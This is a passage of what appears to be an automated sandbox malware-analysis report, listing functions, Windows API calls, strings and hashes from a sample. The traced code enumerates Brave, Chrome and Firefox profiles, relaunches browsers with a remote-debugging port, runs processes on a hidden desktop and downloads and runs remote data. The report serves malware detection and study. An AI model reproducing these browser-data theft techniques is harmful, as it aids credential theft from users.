1097->1096 1106 40c80d-40c883 call 41aab0 * 2 call 401590 call 41aab0 * 2 call 41aa50 call 40be40 1102->1106 1107 40c88e-40c899 call 41ad50 * 2 1102->1107 1211 40c888 1106->1211 1107->984 1118 40c435-40c43c 1109->1118 1119 40c4eb-40c57a memset call 41ade0 lstrcatA call 41ade0 lstrcatA * 2 call 41ade0 * 2 call 401590 call 409e30 1109->1119 1116 40c792-40c7a7 StrCmpCA 1110->1116 1117 40c5a5-40c70e call 41aa50 call 41acc0 call 41abb0 call 41ab10 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41ade0 * 2 CopyFileA call 401590 call 41aab0 * 3 call 40aec0 call 401590 call 41aab0 * 3 call 40b4c0 call 41ade0 StrCmpCA 1110->1117 1116->1102 1126 40c7a9-40c7f3 call 401590 call 41aab0 * 3 call 40b200 1116->1126 1279 40c710-40c75d call 401590 call 41aab0 * 3 call 40ba50 1117->1279 1280 40c768-40c780 call 41ade0 DeleteFileA call 41ad50 1117->1280 1127 40c442-40c4e0 memset call 41ade0 lstrcatA call 41ade0 lstrcatA * 2 call 41ade0 * 2 call 401590 call 409e30 1118->1127 1128 40c4e6 1118->1128 1207 40c57f 1119->1207 1201 40c7f8 1126->1201 1127->1128 1136 40c585 1128->1136 1136->1102 1148->1102 1201->1102 1207->1136 1211->1107 1246->1079 1247->1246 1296 40c762 1279->1296 1287 40c785-40c790 call 41ab10 1280->1287 1287->1102 1296->1280
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040C8A9
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040C8BB
                                                                                                                                              Strings
                                                                                                                                              • Brave, xrefs: 0040C0E8
                                                                                                                                              • \Brave\Preferences, xrefs: 0040C1C1
                                                                                                                                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
                                                                                                                                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
                                                                                                                                              • Preferences, xrefs: 0040C104
                                                                                                                                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
                                                                                                                                              • Google Chrome, xrefs: 0040C6F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                              • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                              • API String ID: 3334442632-1869280968
                                                                                                                                              • Opcode ID: f00c61c6aaa1c618dd9d09b98fed3dcc79ec8b87da68eab279f608cbfd216434
                                                                                                                                              • Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
                                                                                                                                              • Opcode Fuzzy Hash: f00c61c6aaa1c618dd9d09b98fed3dcc79ec8b87da68eab279f608cbfd216434
                                                                                                                                              • Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA
                                                                                                                                              Function 00414B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • wsprintfA.USER32 ref: 00414B7C
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*$-SA
                                                                                                                                              • API String ID: 180737720-309722913
                                                                                                                                              • Opcode ID: 9989705b10511079cbc1c9db8c5933311762cc962bdf51fd0f19e0690b846a51
                                                                                                                                              • Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
                                                                                                                                              • Opcode Fuzzy Hash: 9989705b10511079cbc1c9db8c5933311762cc962bdf51fd0f19e0690b846a51
                                                                                                                                              • Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95
                                                                                                                                              Function 00409E30 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00409E47
                                                                                                                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,0099BC18,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                              • wsprintfA.USER32 ref: 00409E7F
                                                                                                                                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
                                                                                                                                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
                                                                                                                                              • memset.MSVCRT ref: 00409EED
                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 00409F03
                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 00409F17
                                                                                                                                              • lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
                                                                                                                                              • memset.MSVCRT ref: 00409F3D
                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
                                                                                                                                              • memset.MSVCRT ref: 00409F9C
                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 0040A013
                                                                                                                                              • CloseDesktop.USER32(00000000), ref: 0040A060
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                                                                                                                              • String ID: D
                                                                                                                                              • API String ID: 1347862506-2746444292
                                                                                                                                              • Opcode ID: 3d12e0d4e43fffb5f9c536bbb0717a46f105a0d2b025c8c9b9a4228219c638b9
                                                                                                                                              • Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
                                                                                                                                              • Opcode Fuzzy Hash: 3d12e0d4e43fffb5f9c536bbb0717a46f105a0d2b025c8c9b9a4228219c638b9
                                                                                                                                              • Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55
                                                                                                                                              Function 004140F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • wsprintfA.USER32 ref: 00414113
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041412A
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 004142D1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                              • String ID: %s\%s
                                                                                                                                              • API String ID: 180737720-4073750446
                                                                                                                                              • Opcode ID: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                                                                                                                              • Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
                                                                                                                                              • Opcode Fuzzy Hash: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                                                                                                                              • Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59
                                                                                                                                              Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82networkmemoryfileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00405021
                                                                                                                                              • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
                                                                                                                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                                                                                                                              • InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
                                                                                                                                              • EntryPoint.WGO3GA1AL9(+aA), ref: 00405109
                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00405116
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internet$HeapOpen$AllocateCloseEntryFileHandlePointProcessReadmemcpy
                                                                                                                                              • String ID: +aA$+aA
                                                                                                                                              • API String ID: 3347806034-2425922966
                                                                                                                                              • Opcode ID: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                                                                                                                              • Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
                                                                                                                                              • Opcode Fuzzy Hash: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                                                                                                                              • Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D
                                                                                                                                              Function 0040DF10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
                                                                                                                                              • LCMapStringW.KERNEL32(000000FF), ref: 0040E4F2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$FileFind$FirstNextStringlstrcatlstrlen
                                                                                                                                              • String ID: 4@$\*.*
                                                                                                                                              • API String ID: 2668475268-1993203227
                                                                                                                                              • Opcode ID: cac57b4eff4832be87ea5466b3359097d901af3228d06c9e56a8b88fdf20c576
                                                                                                                                              • Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
                                                                                                                                              • Opcode Fuzzy Hash: cac57b4eff4832be87ea5466b3359097d901af3228d06c9e56a8b88fdf20c576
                                                                                                                                              • Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A
                                                                                                                                              Function 0040F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
                                                                                                                                              • StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
                                                                                                                                              • StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040FBB1
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040FBC3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                              • String ID: prefs.js
                                                                                                                                              • API String ID: 3334442632-3783873740
                                                                                                                                              • Opcode ID: df3e9ba8c127a5cb1c3bff235409d8278fc14bd44f389623d2b1d71e49626092
                                                                                                                                              • Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
                                                                                                                                              • Opcode Fuzzy Hash: df3e9ba8c127a5cb1c3bff235409d8278fc14bd44f389623d2b1d71e49626092
                                                                                                                                              • Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A
                                                                                                                                              Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,00401F6C,?,004252EC,?,?,00000000,?,00000000), ref: 00401963
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00425394), ref: 004019B3
                                                                                                                                              • StrCmpCA.SHLWAPI(?,0042543C), ref: 004019C9
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00401E72
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
